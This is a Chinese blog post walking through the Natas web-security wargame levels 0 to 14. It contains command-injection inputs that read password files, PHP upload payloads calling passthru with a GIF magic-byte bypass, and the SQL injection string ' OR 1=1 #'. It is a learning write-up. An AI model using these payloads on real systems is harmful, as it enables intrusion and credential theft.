<!DOCTYPE html>
<html lang="en-us">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    
    <meta property="og:site_name" content="Mr.Be1ieVe&#39;s Treasure">
    <meta property="og:type" content="article">

    
    <meta property="og:image" content="https://mrbelieve.tech/img/home-bg-universe.jpg">
    <meta property="twitter:image" content="https://mrbelieve.tech/img/home-bg-universe.jpg" />
    

    
    <meta name="title" content="Natas" />
    <meta property="og:title" content="Natas" />
    <meta property="twitter:title" content="Natas" />
    

    
    <meta name="description" content="Mr.Be1ieVe，安全运营, 信息安全，生活家 | 这里是 Mr.Be1ieVe 的博客，与你一同学习进步。">
    <meta property="og:description" content="Mr.Be1ieVe，安全运营, 信息安全，生活家 | 这里是 Mr.Be1ieVe 的博客，与你一同学习进步。" />
    <meta property="twitter:description" content="Mr.Be1ieVe，安全运营, 信息安全，生活家 | 这里是 Mr.Be1ieVe 的博客，与你一同学习进步。" />
    

    
    <meta property="twitter:card" content="summary" />
    
    

    <meta name="keyword"  content="Mr.Be1ieVe">
    <link rel="shortcut icon" href="/img/favicon.ico">

    <title>Natas | Mr.Be1ieVe的博客 | Mr.Be1ieVe&#39;s Blog</title>

    <link rel="canonical" href="/post/natas/">

    
    
    
    <link rel="stylesheet" href="/css/bootstrap.min.css">

    
    <link rel="stylesheet" href="/css/hugo-theme-cleanwhite.min.css">

    
    <link rel="stylesheet" href="/css/zanshang.css">

    
    <link href="https://cdn.jsdelivr.net/gh/FortAwesome/Font-Awesome@5.15.1/css/all.css" rel="stylesheet" type="text/css">

    
    

    
    <script src="/js/jquery.min.js"></script>

    
    <script src="/js/bootstrap.min.js"></script>

    
    <script src="/js/hux-blog.min.js"></script>

    
    

</head>




<nav class="navbar navbar-default navbar-custom navbar-fixed-top">

    <div class="container-fluid">
        
        <div class="navbar-header page-scroll">
            <button type="button" class="navbar-toggle">
                <span class="sr-only">Toggle navigation</span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
            </button>
            <a class="navbar-brand" href="/">Mr.Be1ieVe&#39;s Treasure</a>
        </div>

        
        
        <div id="huxblog_navbar">
            <div class="navbar-collapse">
                <ul class="nav navbar-nav navbar-right">
                    <li>
                        <a href="/">All Posts</a>
                    </li>
                    
                        
                        <li>
                            <a href="/categories/%E4%B8%AA%E4%BA%BA%E5%8E%9F%E5%88%99%E5%AE%AA%E6%B3%95">个人原则宪法</a>
                        </li>
                        
                        <li>
                            <a href="/categories/%E5%AE%89%E5%85%A8%E5%BB%BA%E8%AE%BE%E5%AE%9E%E8%B7%B5">安全建设实践</a>
                        </li>
                        
                        <li>
                            <a href="/categories/%E5%BA%95%E5%B1%82%E5%8E%9F%E7%90%86%E6%80%9D%E8%80%83%E4%B8%8E%E5%88%86%E6%9E%90">底层原理思考与分析</a>
                        </li>
                        
                    
                    
		    
                        <li><a href="/top/archive/">ARCHIVE</a></li>
                    
                        <li><a href="/top/about/">ABOUT</a></li>
                    

                    
		    <li>
                        <a href="/search"><i class="fa fa-search"></i></a>
		    </li>
                    
                </ul>
            </div>
        </div>
        
    </div>
    
</nav>
<script>
    
    
    
    var $body   = document.body;
    var $toggle = document.querySelector('.navbar-toggle');
    var $navbar = document.querySelector('#huxblog_navbar');
    var $collapse = document.querySelector('.navbar-collapse');

    $toggle.addEventListener('click', handleMagic)
    function handleMagic(e){
        if ($navbar.className.indexOf('in') > 0) {
        
            $navbar.className = " ";
            
            setTimeout(function(){
                
                if($navbar.className.indexOf('in') < 0) {
                    $collapse.style.height = "0px"
                }
            },400)
        }else{
        
            $collapse.style.height = "auto"
            $navbar.className += " in";
        }
    }
</script>




<style type="text/css">
    header.intro-header {
        background-image: url('/img/home-bg-universe.jpg')
    }
</style>

<header class="intro-header" >

    <div class="container">
        <div class="row">
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                <div class="post-heading">
                    <div class="tags">
                        
                    </div>
                    <h1>Natas</h1>
                    <h2 class="subheading"></h2>
                    <span class="meta">
                        
                            Posted by 
                            
                                    Mr.Be1ieVe&#39;s Treasure
                             
                            on 
                            Saturday, May 23, 2020
                            
                            
                            
                            
                    </span>
                </div>
            </div>
        </div>
    </div>
</header>




<article>
    <div class="container">
        <div class="row">

            
            <div class="
                col-lg-8 col-lg-offset-2
                col-md-10 col-md-offset-1
                post-container">

                
                <h2 id="natas0">natas0</h2>
<p>
  <img src="/img/natas/image-20200523105927810.png" alt="image-20200523105927810">

</p>
<h2 id="natas1">natas1</h2>
<p>禁用了右键，但还是可以F12或者</p>
<p>
  <img src="/img/natas/image-20200523110204498.png" alt="image-20200523110204498">

</p>
<h2 id="natas2">natas2</h2>
<p>打开过<code>files/pixel.png</code>，但没想到这是目录权限问题。。。。顺便搜了一下爆破文件目录的工具，kali自带的dirbuster <a href="https://www.cnblogs.com/xz25/p/12829315.html">link</a></p>
<p>
  <img src="/img/natas/image-20200523132558927.png" alt="image-20200523132558927">

</p>
<h2 id="natas3">natas3</h2>
<p>
  <img src="/img/natas/image-20200523133355938.png" alt="image-20200523133355938">

</p>
<p>谷歌找不到&ndash;九-曲-十-八-弯&mdash;&gt;robots.txt</p>
<p>awsl</p>
<h2 id="natas4">natas4</h2>
<p>
  <img src="/img/natas/image-20200523135615494.png" alt="image-20200523135615494">

</p>
<p>点击refresh之后Referer会显示，改成对应的natas5即可</p>
<h2 id="natas5">natas5</h2>
<p>Login, 那就看cookie</p>
<p>
  <img src="/img/natas/image-20200523140637488.png" alt="image-20200523140637488">

</p>
<p>改成1就行</p>
<h2 id="natas6">natas6</h2>
<p>
  <img src="/img/natas/image-20200523142611838.png" alt="image-20200523142611838">

</p>
<p>打开再按f12就可以看见了</p>
<h2 id="natas7">natas7</h2>
<p>
  <img src="/img/natas/image-20200523142927279.png" alt="image-20200523142927279">

</p>
<p>看到hint之后，就尝试在url中尝试page=ls</p>
<p>
  <img src="/img/natas/image-20200523143009363.png" alt="image-20200523143009363">

</p>
<p>等号后输入hint的就行</p>
<h2 id="natas8">natas8</h2>
<p>
  <img src="/img/natas/image-20200523165112708.png" alt="image-20200523165112708">

</p>
<p>给的很清楚，输入的数值，先base64_encode，再strrev，再bin2hex，如果和encodedSecret一样就get了</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#ff79c6">&lt;?</span>
</span></span><span style="display:flex;"><span><span style="color:#8be9fd;font-style:italic">$encodedSecret</span> <span style="color:#ff79c6">=</span> <span style="color:#f1fa8c">&#34;3d3d516343746d4d6d6c315669563362&#34;</span>;
</span></span><span style="display:flex;"><span><span style="color:#8be9fd;font-style:italic">$result</span> <span style="color:#ff79c6">=</span> base64_decode(strrev(hex2bin(<span style="color:#8be9fd;font-style:italic">$encodedSecret</span>)));
</span></span><span style="display:flex;"><span><span style="color:#ff79c6">echo</span> <span style="color:#8be9fd;font-style:italic">$result</span>;
</span></span><span style="display:flex;"><span><span style="color:#ff79c6">?&gt;</span>
</span></span></code></pre></div><blockquote>
<p>mac 自带了php环境hhh真好</p>
</blockquote>
<h2 id="natas9">natas9</h2>
<p>命令注入</p>
<blockquote>
<p>passthru ( string <code>$command</code> [, int <code>&amp;$return_var</code> ] ) : void</p>
<p>同 <a href="https://www.php.net/manual/zh/function.exec.php">exec()</a> 函数类似， <strong>passthru()</strong> 函数 也是用来执行外部命令（<code>command</code>）的。 当所执行的 Unix 命令输出二进制数据， 并且需要直接传送到浏览器的时候， 需要用此函数来替代 <a href="https://www.php.net/manual/zh/function.exec.php">exec()</a> 或 <a href="https://www.php.net/manual/zh/function.system.php">system()</a> 函数。 常用来执行诸如 pbmplus 之类的可以直接输出图像流的命令。 通过设置 Content-type 为 <em>image/gif</em>， 然后调用 pbmplus 程序输出 gif 文件， 就可以从 PHP 脚本中直接输出图像到浏览器。</p>
<h3 id="参数-httpswwwphpnetmanualzhfunctionpassthruphprefsect1-functionpassthru-parameters">参数<a href="https://www.php.net/manual/zh/function.passthru.php#refsect1-function.passthru-parameters"> ¶</a></h3>
<ul>
<li>
<p><code>command</code></p>
<p>要执行的命令。</p>
</li>
<li>
<p><code>return_var</code></p>
<p>如果提供 <code>return_var</code> 参数， Unix 命令的返回状态会被记录到此参数。</p>
</li>
</ul>
</blockquote>
<p>密码均存储在/etc/natas_webpass目录下（百度来的</p>
<p><code>passthru(&quot;grep -i $key dictionary.txt&quot;);</code></p>
<p>并且在shell中，#可以注释掉后面的</p>
<p>所以当</p>
<pre tabindex="0"><code>$key = | cat /etc/natas_webpass/natas10 #
$key = &amp; cat /etc/natas_webpass/natas10 #
$key = | cat /etc/natas_webpass/natas10
$key = &amp; cat /etc/natas_webpass/natas10
</code></pre><p>时，对应的shell命令为</p>
<pre tabindex="0"><code>grep -i | cat /etc/natas_webpass/natas10 dictionary.txt
grep -i &amp; cat /etc/natas_webpass/natas10
</code></pre><p>这样都行</p>
<h2 id="natas10">natas10</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#ff79c6">if</span>(<span style="color:#8be9fd;font-style:italic">$key</span> <span style="color:#ff79c6">!=</span> <span style="color:#f1fa8c">&#34;&#34;</span>) {
</span></span><span style="display:flex;"><span>    <span style="color:#ff79c6">if</span>(preg_match(<span style="color:#f1fa8c">&#39;/[;|&amp;]/&#39;</span>,<span style="color:#8be9fd;font-style:italic">$key</span>)) {
</span></span><span style="display:flex;"><span>        <span style="color:#ff79c6">print</span> <span style="color:#f1fa8c">&#34;Input contains an illegal character!&#34;</span>;
</span></span><span style="display:flex;"><span>    } <span style="color:#ff79c6">else</span> {
</span></span><span style="display:flex;"><span>        passthru(<span style="color:#f1fa8c">&#34;grep -i </span><span style="color:#f1fa8c">$key</span><span style="color:#f1fa8c"> dictionary.txt&#34;</span>);
</span></span><span style="display:flex;"><span>    }
</span></span></code></pre></div><blockquote>
<ul>
<li>Search in case-insensitive mode:
grep -i search_string path/to/file</li>
</ul>
</blockquote>
<p>grep还可以用正则，所以这里</p>
<pre tabindex="0"><code>$key = [a-zA-Z] /etc/natas_webpass/natas11 #
grep -i [a-zA-Z] /etc/natas_webpass/natas11 # dictionary.txt
</code></pre><h2 id="natas12">natas12</h2>
<p>把文件名随机了，把后缀改成jpg了</p>
<p>内容没有检测，尝试upload的时候用bp把文件后缀改成php就可以打开，那</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#ff79c6">&lt;?</span>
</span></span><span style="display:flex;"><span>    passthru(<span style="color:#f1fa8c">&#39;cat /etc/natas_webpass/natas13&#39;</span>);
</span></span><span style="display:flex;"><span><span style="color:#ff79c6">?&gt;</span>
</span></span></code></pre></div><h2 id="natas13">natas13</h2>
<p>通过 <code>php</code>的函数 <code>exif_imagetype()</code> 来判断文件夹类型，</p>
<p>可以查看php的文档，这个函数通过检查文件的签名（第一个字节），从而检测文件类型。</p>
<p>可以用<a href="https://blog.csdn.net/piaolankeke/article/details/5872876">GIF98a</a>来骗过</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span>GIF98a
</span></span><span style="display:flex;"><span><span style="color:#ff79c6">&lt;?</span>
</span></span><span style="display:flex;"><span>    passthru(<span style="color:#f1fa8c">&#39;cat /etc/natas_webpass/natas14&#39;</span>);
</span></span><span style="display:flex;"><span><span style="color:#ff79c6">?&gt;</span>
</span></span></code></pre></div><h2 id="natas14">natas14</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#8be9fd;font-style:italic">$query</span> <span style="color:#ff79c6">=</span> <span style="color:#f1fa8c">&#34;SELECT * from users where username=</span><span style="color:#f1fa8c">\&#34;</span><span style="color:#f1fa8c">&#34;</span><span style="color:#ff79c6">.</span><span style="color:#8be9fd;font-style:italic">$_REQUEST</span>[<span style="color:#f1fa8c">&#34;username&#34;</span>]<span style="color:#ff79c6">.</span><span style="color:#f1fa8c">&#34;</span><span style="color:#f1fa8c">\&#34;</span><span style="color:#f1fa8c"> and password=</span><span style="color:#f1fa8c">\&#34;</span><span style="color:#f1fa8c">&#34;</span><span style="color:#ff79c6">.</span><span style="color:#8be9fd;font-style:italic">$_REQUEST</span>[<span style="color:#f1fa8c">&#34;password&#34;</span>]<span style="color:#ff79c6">.</span><span style="color:#f1fa8c">&#34;</span><span style="color:#f1fa8c">\&#34;</span><span style="color:#f1fa8c">&#34;</span>; 
</span></span></code></pre></div><p>万能sql密码<code>&quot; OR 1=1 #</code></p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-mysql" data-lang="mysql"><span style="display:flex;"><span><span style="color:#ff79c6">SELECT</span> <span style="color:#ff79c6">*</span> <span style="color:#ff79c6">from</span> users <span style="color:#ff79c6">where</span> username<span style="color:#ff79c6">=</span><span style="color:#f1fa8c">&#34;&#34;</span> <span style="color:#ff79c6">OR</span> <span style="color:#bd93f9">1</span><span style="color:#ff79c6">=</span><span style="color:#bd93f9">1</span> <span style="color:#6272a4"># and password= &#34;&#34;
</span></span></span></code></pre></div>

                
                
<div class="entry-shang text-center">
    
	    <p>「真诚赞赏，手留余香」</p>
	
	<button class="zs show-zs btn btn-bred">赞赏支持</button>
</div>
<div class="zs-modal-bg"></div>
<div class="zs-modal-box">
	<div class="zs-modal-head">
		<button type="button" class="close">×</button>
		<span class="author"><a href="https://mrbelieve.tech"><img src="/img/favicon.png" />Mr.Be1ieVe&#39;s Treasure</a></span>
        
	        <p class="tip"><i></i><span>真诚赞赏，手留余香</span></p>
		
 
	</div>
	<div class="zs-modal-body">
		<div class="zs-modal-btns">
			<button class="btn btn-blink" data-num="2">2元</button>
			<button class="btn btn-blink" data-num="5">5元</button>
			<button class="btn btn-blink" data-num="10">10元</button>
			<button class="btn btn-blink" data-num="50">50元</button>
			<button class="btn btn-blink" data-num="100">100元</button>
			<button class="btn btn-blink" data-num="1">任意金额</button>
		</div>
		<div class="zs-modal-pay">
			<button class="btn btn-bred" id="pay-text">2元</button>
			<p>使用<span id="pay-type">微信</span>扫描二维码完成支付</p>
			<img src="/img/reward/wechat-2.png"  id="pay-image"/>
		</div>
	</div>
	<div class="zs-modal-footer">
		<label><input type="radio" name="zs-type" value="wechat" class="zs-type" checked="checked"><span ><span class="zs-wechat"><img src="/img/reward/wechat-btn.png"/></span></label>
		<label><input type="radio" name="zs-type" value="alipay" class="zs-type" class="zs-alipay"><img src="/img/reward/alipay-btn.png"/></span></label>
	</div>
</div>
<script type="text/javascript" src="/js/reward.js"></script>

                

                <hr>
                <ul class="pager">
                    
                    <li class="previous">
                        <a href="/post/%E6%95%B0%E6%8D%AE%E5%BA%93%E4%BD%BF%E7%94%A8%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/" data-toggle="tooltip" data-placement="top" title="数据库使用&amp;学习记录">&larr;
                            Previous Post</a>
                    </li>
                    
                    
                    <li class="next">
                        <a href="/post/%E7%BC%96%E8%AF%91%E5%8E%9F%E7%90%86%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" data-toggle="tooltip" data-placement="top" title="编译原理学习笔记">Next
                            Post &rarr;</a>
                    </li>
                    
                </ul>
                

            </div>

            
            
            <div class="
                col-lg-2 col-lg-offset-0
                visible-lg-block
                sidebar-container
                catalog-container">
                <div class="side-catalog">
                    <hr class="hidden-sm hidden-xs">
                    <h5>
                        <a class="catalog-toggle" href="#">CATALOG</a>
                    </h5>
                    <ul class="catalog-body"></ul>
                </div>
            </div>
            

            
            <div class="
                col-lg-8 col-lg-offset-2
                col-md-10 col-md-offset-1
                sidebar-container">

                
                
                <section>
                    <hr class="hidden-sm hidden-xs">
                    <h5><a href="/tags/">FEATURED TAGS</a></h5>
                    <div class="tags">
                        
                        
                        
                        
                        
                        <a href="/tags/awd" title="awd">
                            awd
                        </a>
                        
                        
                        
                        <a href="/tags/buu" title="buu">
                            buu
                        </a>
                        
                        
                        
                        <a href="/tags/ctf" title="ctf">
                            ctf
                        </a>
                        
                        
                        
                        <a href="/tags/hackthebox" title="hackthebox">
                            hackthebox
                        </a>
                        
                        
                        
                        
                        
                        <a href="/tags/linux%E4%BD%BF%E7%94%A8" title="linux使用">
                            linux使用
                        </a>
                        
                        
                        
                        
                        
                        
                        
                        
                        
                        
                        
                        
                        
                        <a href="/tags/xray" title="xray">
                            xray
                        </a>
                        
                        
                        
                        <a href="/tags/%E4%B8%93%E4%B8%9A%E5%AD%A6%E4%B9%A0" title="专业学习">
                            专业学习
                        </a>
                        
                        
                        
                        
                        
                        
                        
                        <a href="/tags/%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86" title="基础知识">
                            基础知识
                        </a>
                        
                        
                        
                        
                        
                        
                        
                        <a href="/tags/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0" title="学习笔记">
                            学习笔记
                        </a>
                        
                        
                        
                        
                        
                        
                        
                        
                        
                        
                        
                        
                        
                        
                        
                        
                        
                        
                        
                        
                        
                        
                    </div>
                </section>
                

                
                
            </div>
        </div>
    </div>
</article>




<footer>
    <div class="container">
        <div class="row">
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                <ul class="list-inline text-center">                  
                    
                    <li>
                        <a href="mailto:mr_believe@outlook.com">
                            <span class="fa-stack fa-lg">
                                <i class="fas fa-circle fa-stack-2x"></i>
                                <i class="fas fa-envelope fa-stack-1x fa-inverse"></i>
                            </span>
                        </a>
                    </li>
		           
                    
                    
                    
                    

		            
                    
                    
                    <li>
                        <a target="_blank" href="https://github.com/MrBe1ieVe">
                            <span class="fa-stack fa-lg">
                                <i class="fas fa-circle fa-stack-2x"></i>
                                <i class="fab fa-github fa-stack-1x fa-inverse"></i>
                            </span>
                        </a>
                    </li>
		            
                    
                    
                    
                    
                    
                    
                    
                    
                    
            
            
            
           
                   <li>
                       <a href='' rel="alternate" type="application/rss+xml" title="Mr.Be1ieVe&#39;s Treasure" >
                           <span class="fa-stack fa-lg">
                               <i class="fas fa-circle fa-stack-2x"></i>
                               <i class="fas fa-rss fa-stack-1x fa-inverse"></i>
                           </span>
                       </a>
                   </li>
            
             </ul>
		<p class="copyright text-muted">
                    Copyright &copy; Mr.Be1ieVe&#39;s Treasure 2022
                    <br>
                    <a href="https://themes.gohugo.io/hugo-theme-cleanwhite">CleanWhite Hugo Theme</a> by <a href="https://zhaohuabing.com">Huabing</a> |
                    <iframe
                        style="margin-left: 2px; margin-bottom:-5px;"
                        frameborder="0" scrolling="0" width="100px" height="20px"
                        src="https://ghbtns.com/github-btn.html?user=zhaohuabing&repo=hugo-theme-cleanwhite&type=star&count=true" >
                    </iframe>
                </p>
            </div>
        </div>
    </div>
</footer>




<script>
    function loadAsync(u, c) {
      var d = document, t = 'script',
          o = d.createElement(t),
          s = d.getElementsByTagName(t)[0];
      o.src = u;
      if (c) { o.addEventListener('load', function (e) { c(null, e); }, false); }
      s.parentNode.insertBefore(o, s);
    }
</script>






<script>
    
    if($('#tag_cloud').length !== 0){
        loadAsync("/js/jquery.tagcloud.js",function(){
            $.fn.tagcloud.defaults = {
                
                color: {start: '#bbbbee', end: '#0085a1'},
            };
            $('#tag_cloud a').tagcloud();
        })
    }
</script>


<script>
    loadAsync("https://cdn.jsdelivr.net/npm/fastclick@1.0.6/lib/fastclick.min.js", function(){
        var $nav = document.querySelector("nav");
        if($nav) FastClick.attach($nav);
    })
</script>









<script type="text/javascript">
    function generateCatalog(selector) {

        
        
        
        
            _containerSelector = 'div.post-container'
        

        
        var P = $(_containerSelector), a, n, t, l, i, c;
        a = P.find('h1,h2,h3,h4,h5,h6');

        
        $(selector).html('')

        
        a.each(function () {
            n = $(this).prop('tagName').toLowerCase();
            i = "#" + $(this).prop('id');
            t = $(this).text();
            c = $('<a href="' + i + '" rel="nofollow">' + t + '</a>');
            l = $('<li class="' + n + '_nav"></li>').append(c);
            $(selector).append(l);
        });
        return true;
    }

    generateCatalog(".catalog-body");

    
    $(".catalog-toggle").click((function (e) {
        e.preventDefault();
        $('.side-catalog').toggleClass("fold")
    }))

    


    loadAsync("\/js\/jquery.nav.js", function () {
        $('.catalog-body').onePageNav({
            currentClass: "active",
            changeHash: !1,
            easing: "swing",
            filter: "",
            scrollSpeed: 700,
            scrollOffset: 0,
            scrollThreshold: .2,
            begin: null,
            end: null,
            scrollChange: null,
            padding: 80
        });
    });
</script>





</body>
</html>
